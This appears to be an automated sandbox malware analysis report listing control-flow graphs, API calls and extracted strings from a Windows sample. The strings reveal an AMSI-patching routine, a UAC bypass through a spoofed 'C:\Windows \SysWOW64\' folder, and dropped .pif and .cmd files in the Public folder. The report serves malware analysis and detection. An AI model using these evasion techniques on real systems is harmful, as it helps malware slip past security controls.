27d46d4 * 2 9762->9777 9807 27fa2ae-27fa2b5 call 27e889c 9777->9807 9816 27fa2ba-27fa2dc call 27d46d4 * 2 9807->9816 9844 27fa2e1-27fa2e8 call 27e889c 9816->9844 9859 27fa2ed-27fa30f call 27d46d4 * 2 9844->9859 9891 27fa314-27fa31b call 27e889c 9859->9891 10550 27f9495-27f956c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 9863->10550 9864->9863 9906 27fa320-27fa342 call 27d46d4 * 2 9891->9906 9930 27fa347-27fa34e call 27e889c 9906->9930 9944 27fa353-27fa3be call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9930->9944 10027 27fa3c3-27fa3ca call 27e889c 9944->10027 9974->9141 10034 27fa3cf-27fa614 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 10027->10034 10264 27fa619-27fa620 call 27e889c 10034->10264 10079->9633 10086->9578 10270 27fa625-27fa647 call 27d46d4 * 2 10264->10270 10283 27fa64c-27fa653 call 27e889c 10270->10283 10289 27fa658-27fa67a call 27d46d4 * 2 10283->10289 10301 27fa67f-27fa686 call 27e889c 10289->10301 10305 27fa68b-27fa6ad call 27d46d4 * 2 10301->10305 10317 27fa6b2-27fa6b9 call 27e889c 10305->10317 10323 27fa6be-27fab58 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c * 5 10317->10323 10628 27fab5d-27fabb2 call 27e889c * 6 10323->10628 10487 27f7225-27f723c call 27d3700 10482->10487 10550->8960 10640 27fabb7-27fabc1 call 27e889c 10628->10640 10642 27fabc6-27fabee call 27e889c * 3 10640->10642 10648 27fabf3-27faf79 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 10642->10648 10752 27faf7e-27faf85 call 27e889c 10648->10752 10754 27faf8a-27fafac call 27d46d4 * 2 10752->10754 10758 27fafb1-27fafb8 call 27e889c 10754->10758 10760 27fafbd-27fafdf call 27d46d4 * 2 10758->10760 10764 27fafe4-27fafeb call 27e889c 10760->10764 10766 27faff0-27fb012 call 27d46d4 * 2 10764->10766 10770 27fb017-27fb01e call 27e889c 10766->10770 10772 27fb023-27fb045 call 27d46d4 * 2 10770->10772 10776 27fb04a-27fb051 call 27e889c 10772->10776 10778 27fb056-27fb49e call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27e7c10 call 27e8204 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 10776->10778 10908 27fb4a3-27fb4a5 ExitProcess 10778->10908
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,027FBD74), ref: 027F549F
                                                                                          • Part of subcall function 027EDEF8: Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                          • Part of subcall function 027EDEF8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                          • Part of subcall function 027EDEF8: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                        • Sleep.KERNEL32(000007D0,ScanBuffer,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4), ref: 027F458A
                                                                                          • Part of subcall function 027EDF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                          • Part of subcall function 027EDF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
                                                                                          • Part of subcall function 027EDF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                          • Part of subcall function 027EDF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                          • Part of subcall function 027E8784: LoadLibraryW.KERNEL32(amsi), ref: 027E878D
                                                                                          • Part of subcall function 027E8784: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027E87EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$FilePath$FreeLoad$AddressNameName_ProcSleep$AttributesCloseCreateDeleteHandleModuleWrite
                                                                                        • String ID: .url$@echo off@%.%e%%c% %h% %o%.oo.% %.%o%$C:\Users\Public\$C:\Users\Public\alpha.pif$C:\Users\Public\xkn.pif$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.pif$FX.c$HotKey=$IconIndex=$Initialize$NEO.c$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                        • API String ID: 3260000616-127592166
                                                                                        • Opcode ID: cdb8d9ae3799dcb8fbd723b4d8fa793081b16cbc478ca56db1a113b70fe8c2df
                                                                                        • Instruction ID: 168ab9fc6185536955297ed84cedf4d88a4970db049c131dc4aa1071cfba4ec2
                                                                                        • Opcode Fuzzy Hash: cdb8d9ae3799dcb8fbd723b4d8fa793081b16cbc478ca56db1a113b70fe8c2df
                                                                                        • Instruction Fuzzy Hash: 73437839B1425D8FDF62EB65DC95A9AB3B6FF89304F1040E29549AB350CB30AE95CF01
                                                                                        Function 027EE96C Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 10935 27ee96c-27ee970 10936 27ee975-27ee97a 10935->10936 10936->10936 10937 27ee97c-27eef75 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4740 * 2 call 27d4860 call 27d4778 call 27d30d4 call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4740 call 27d7f2c call 27d49a0 call 27d4d74 call 27d4df0 call 27d4740 call 27d49a0 call 27d4d74 call 27d4df0 call 27e8654 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 10936->10937 11140 27eef7b-27ef1d1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c WaitForSingleObject CloseHandle * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 * 3 10937->11140 11141 27ef1d6-27ef223 call 27d4500 call 27d4c60 call 27d4500 call 27d4c60 call 27d4500 10937->11141 11140->11141
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240,OpenSession,0282B37C), ref: 027EF062
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240,OpenSession), ref: 027EF06A
                                                                                        • CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240), ref: 027EF073
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Handle$AddressCloseFreeLoadProc$CreateModuleObjectProcessSingleUserWait
                                                                                        • String ID: "C:\Users\Public\UhzauuilF.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                        • API String ID: 1374282660-1977161105
                                                                                        • Opcode ID: 301983626862f68b34f57367ed03b68f4faa6cd3caf82301b64375c8f43d80f3
                                                                                        • Instruction ID: 937123c618af745aec95b44303474c37011f438fa102242178fb527afb3add8f
                                                                                        • Opcode Fuzzy Hash: 301983626862f68b34f57367ed03b68f4faa6cd3caf82301b64375c8f43d80f3
                                                                                        • Instruction Fuzzy Hash: 86222079A0015D9BDF12FB64D895FCE73BAEF89300F1041A1D00AEBA54DB70AE458F66
                                                                                        Function 027D1724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 11224 27d1724-27d1736 11225 27d173c-27d174c 11224->11225 11226 27d1968-27d196d 11224->11226 11229 27d174e-27d175b 11225->11229 11230 27d17a4-27d17ad 11225->11230 11227 27d1a80-27d1a83 11226->11227 11228 27d1973-27d1984 11226->11228 11234 27d1a89-27d1a8b 11227->11234 11235 27d1684-27d16ad VirtualAlloc 11227->11235 11231 27d1938-27d1945 11228->11231 11232 27d1986-27d19a2 11228->11232 11236 27d175d-27d176a 11229->11236 11237 27d1774-27d1780 11229->11237 11230->11229 11233 27d17af-27d17bb 11230->11233 11231->11232 11238 27d1947-27d195b Sleep 11231->11238 11243 27d19a4-27d19ac 11232->11243 11244 27d19b0-27d19bf 11232->11244 11233->11229 11245 27d17bd-27d17c9 11233->11245 11246 27d16df-27d16e5 11235->11246 11247 27d16af-27d16dc call 27d1644 11235->11247 11239 27d176c-27d1770 11236->11239 11240 27d1794-27d17a1 11236->11240 11241 27d17f0-27d17f9 11237->11241 11242 27d1782-27d1790 11237->11242 11238->11232 11248 27d195d-27d1964 Sleep 11238->11248 11253 27d182c-27d1836 11241->11253 11254 27d17fb-27d1808 11241->11254 11249 27d1a0c-27d1a22 11243->11249 11250 27d19d8-27d19e0 11244->11250 11251 27d19c1-27d19d5 11244->11251 11245->11229 11252 27d17cb-27d17de Sleep 11245->11252 11247->11246 11248->11231 11261 27d1a3b-27d1a47 11249->11261 11262 27d1a24-27d1a32 11249->11262 11257 27d19fc-27d19fe call 27d15cc 11250->11257 11258 27d19e2-27d19fa 11250->11258 11251->11249 11252->11229 11256 27d17e4-27d17eb Sleep 11252->11256 11263 27d18a8-27d18b4 11253->11263 11264 27d1838-27d1863 11253->11264 11254->11253 11259 27d180a-27d181e Sleep 11254->11259 11256->11230 11269 27d1a03-27d1a0b 11257->11269 11258->11269 11259->11253 11271 27d1820-27d1827 Sleep 11259->11271 11265 27d1a49-27d1a5c 11261->11265 11266 27d1a68 11261->11266 11262->11261 11272 27d1a34 11262->11272 11267 27d18dc-27d18eb call 27d15cc 11263->11267 11268 27d18b6-27d18c8 11263->11268 11273 27d187c-27d188a 11264->11273 11274 27d1865-27d1873 11264->11274 11276 27d1a6d-27d1a7f 11265->11276 11277 27d1a5e-27d1a63 call 27d1500 11265->11277 11266->11276 11285 27d18fd-27d1936 11267->11285 11289 27d18ed-27d18f7 11267->11289 11280 27d18cc-27d18da 11268->11280 11281 27d18ca 11268->11281 11271->11254 11272->11261 11278 27d188c-27d18a6 call 27d1500 11273->11278 11279 27d18f8 11273->11279 11274->11273 11275 27d1875 11274->11275 11275->11273 11277->11276 11278->11285 11279->11285 11280->11285 11281->11280
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,027D2000), ref: 027D17D0
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,027D2000), ref: 027D17E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: %@ @
                                                                                        • API String ID: 3472027048-627730658
                                                                                        • Opcode ID: 6f2122a2c84b00ab0b4973288b6894cd6dce4c7779ce96a561e47f2b17a1a5af
                                                                                        • Instruction ID: 9b4a44f34fc998511cc797d3c8d97fa6e0307158248a346909763943e4f6464e
                                                                                        • Opcode Fuzzy Hash: 6f2122a2c84b00ab0b4973288b6894cd6dce4c7779ce96a561e47f2b17a1a5af
                                                                                        • Instruction Fuzzy Hash: E7B1237AA403518FCB25CF68E884366BBF1EB85320F59C6AED44D8B3C5D7709455CBA0
                                                                                        Function 027E8784 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 027E878D
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027E87EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                        • API String ID: 941070894-2671292670
                                                                                        • Opcode ID: 12d5ad69d6a21a699d56558d370034565290fe79da43a445f1d741ffc7831e90
                                                                                        • Instruction ID: 5de997516f76fa62130ead3b54f48cee8b445e45ef87c3ab6d5583d45ca2086e
                                                                                        • Opcode Fuzzy Hash: 12d5ad69d6a21a699d56558d370034565290fe79da43a445f1d741ffc7831e90
                                                                                        • Instruction Fuzzy Hash: 34F0C89004C38179E702E378CC49F4FBECD4B56224F048A1DF1E95A2D2D675D1148777
                                                                                        Function 027D1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 13188 27d1a8c-27d1a9b 13189 27d1b6c-27d1b6f 13188->13189 13190 27d1aa1-27d1aa5 13188->13190 13191 27d1c5c-27d1c60 13189->13191 13192 27d1b75-27d1b7f 13189->13192 13193 27d1b08-27d1b11 13190->13193 13194 27d1aa7-27d1aae 13190->13194 13199 27d16e8-27d170b call 27d1644 VirtualFree 13191->13199 13200 27d1c66-27d1c6b 13191->13200 13195 27d1b3c-27d1b49 13192->13195 13196 27d1b81-27d1b8d 13192->13196 13193->13194 13201 27d1b13-27d1b27 Sleep 13193->13201 13197 27d1adc-27d1ade 13194->13197 13198 27d1ab0-27d1abb 13194->13198 13195->13196 13203 27d1b4b-27d1b5f Sleep 13195->13203 13204 27d1b8f-27d1b92 13196->13204 13205 27d1bc4-27d1bd2 13196->13205 13209 27d1ae0-27d1af1 13197->13209 13210 27d1af3 13197->13210 13206 27d1abd-27d1ac2 13198->13206 13207 27d1ac4-27d1ad9 13198->13207 13218 27d170d-27d1714 13199->13218 13219 27d1716 13199->13219 13201->13194 13202 27d1b2d-27d1b38 Sleep 13201->13202 13202->13193 13203->13196 13211 27d1b61-27d1b68 Sleep 13203->13211 13212 27d1b96-27d1b9a 13204->13212 13205->13212 13215 27d1bd4-27d1bd9 call 27d14c0 13205->13215 13209->13210 13214 27d1af6-27d1b03 13209->13214 13210->13214 13211->13195 13216 27d1bdc-27d1be9 13212->13216 13217 27d1b9c-27d1ba2 13212->13217 13214->13192 13215->13212 13216->13217 13222 27d1beb-27d1bf2 call 27d14c0 13216->13222 13224 27d1bf4-27d1bfe 13217->13224 13225 27d1ba4-27d1bc2 call 27d1500 13217->13225 13223 27d1719-27d1723 13218->13223 13219->13223 13222->13217 13227 27d1c2c-27d1c59 call 27d1560 13224->13227 13228 27d1c00-27d1c28 VirtualFree 13224->13228
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,?,00000000,027D1FE4), ref: 027D1B17
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027D1FE4), ref: 027D1B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: ec7dd740570920120af11f23dc64756616a14f7c0259ecfc184e5d6b2f2e7a1a
                                                                                        • Instruction ID: 7167e9f119d10f7574f90fb094999a807a4a9d106a839c4fc5aa1800680a66cb
                                                                                        • Opcode Fuzzy Hash: ec7dd740570920120af11f23dc64756616a14f7c0259ecfc184e5d6b2f2e7a1a
                                                                                        • Instruction Fuzzy Hash: AB51B0756012408FDB26CF6CD988766BBF1AF85324F9886AED44CCB2C6E770D445CBA1
                                                                                        Function 027EE7AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027EE8EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: 9d94bd773e17a9d2bffed81e9f2e368ec9be08c113f97df11be9f54db925e462
                                                                                        • Instruction ID: 603cb59a6d56da03823cf2c03554072fb639515f315d432e056a91551dfb4e36
                                                                                        • Opcode Fuzzy Hash: 9d94bd773e17a9d2bffed81e9f2e368ec9be08c113f97df11be9f54db925e462
